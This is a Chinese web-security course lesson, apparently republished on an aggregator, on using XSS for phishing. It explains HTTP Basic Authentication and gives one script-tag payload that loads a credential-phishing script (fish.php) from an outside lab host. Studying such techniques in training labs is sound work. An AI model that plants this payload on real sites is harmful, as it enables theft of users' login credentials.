美文网首页
风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

作者: 风炫安全 | 来源:发表于2021-01-09 22:34 被阅读0次

    风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

    XSS钓鱼攻击

    HTTP Basic Authentication认证

    大家在登录网站的时候,大部分时候是通过一个表单提交登录信息。

    但是有时候浏览器会弹出一个登录验证的对话框,如下图,这就是使用HTTP基本认证。

    在你访问一个需要HTTP Basic Authentication的URL的时候,如果你没有提供用户名和密码,服务器就会返回401,如果你直接在浏览器中打开,浏览器会提示你输入用户名和密码,也就是上面的图示。

    要在发送请求的时候添加HTTP Basic Authentication认证信息到请求中,有两种方法:

    一是在请求头中添加Authorization: Authorization: "Basic 用户名和密码的base64加密字符串" 。
    二是在url中添加用户名和密码。

    <script src="http://fx.com/pikachu/pkxss/xfish/fish.php"></script>

    参考:http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第二十四节课-利用xss钓鱼攻击/

    相关文章

      网友评论

          本文标题:风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

          本文链接:https://www.haomeiwen.com/subject/hwuwoktx.html